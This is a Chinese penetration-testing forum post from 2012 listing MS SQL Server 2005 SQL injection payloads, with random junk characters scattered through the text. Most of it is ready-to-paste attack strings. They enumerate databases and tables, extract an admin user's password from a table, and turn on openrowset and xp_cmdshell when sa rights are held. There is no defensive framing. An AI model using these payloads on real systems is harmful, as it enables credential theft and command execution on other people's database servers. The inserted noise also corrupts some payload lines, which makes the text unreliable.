中国网络渗透测试联盟

标题: MSsql2005注入语句 [打印本页]

作者: admin    时间: 2012-9-13 17:19
标题: MSsql2005注入语句

6 f; _( a- a$ }! @% u( y6 f4 ?# k* u  ~& y9 h

& W- `  z# p  O  M[Copy to clipboard]CODE:1 F6 z2 h0 E' O9 f6 v
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
, C! e$ J# q2 {. X9 o6 k! H9 G& E: H8 G0 X4 t
爆表语句,somedb部份是所要列的数据库,红色数字1累加
* I" W# \% v; O/ T4 d& B
: d( D6 C7 P  k6 e6 q6 B% J* U( F
[Copy to clipboard]CODE:
+ w' J$ `1 C, b5 f' q! p; c/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--3 f$ O2 q1 O: t1 `# L" k

7 f  c, H2 L) {  g爆字段语句,爆表admin里user='icerover'的密码段
/ P/ F) n, A6 \8 e) ~- c" B7 u
4 A$ y& Q- [9 Z8 X! q2 G. K  W4 V, c+ J' }- ?4 f- A. y# O
[Copy to clipboard]CODE:
$ U2 r' z* a( @9 w# {( s**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--' _5 {) V% }- t* Y/ O  B0 z

- ]2 j" O) {4 C: f6 C- [mssql2005默认没有开xp_cmdshell的,openrowset也不能用
  i' D* T9 J. I( H2 o如果是sa权限,可以这样来开启
+ E1 T" m% ]9 C' }- b2 R+ i3 O开启openrowset# e" b1 J0 c2 U: t
6 r% `& K# i, @

+ s* i& W- |+ [[Copy to clipboard]CODE:
% I& N$ w& o( ]3 R6 D/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
: P8 Q( D: K! ~6 L* _/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--7 a* q2 M  {. B0 P: u

3 o) k% D, v% p开启xp_cmdshell; N* L5 B; i- t' n0 |. ?
1 d. B" k1 W$ C8 s1 ~
8 w9 e( |" K( D+ N
[Copy to clipboard]CODE:
! H8 \( f7 K, Q, l3 O  gEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
; k9 ]( o4 t5 k8 g) ]EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
* n1 S: |8 u0 z* S" g
8 ]1 s  G$ \1 M0 n0 e9 \5 tok,over~~晚安
2 q- f3 W% r; X2 W  Z& t! G




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2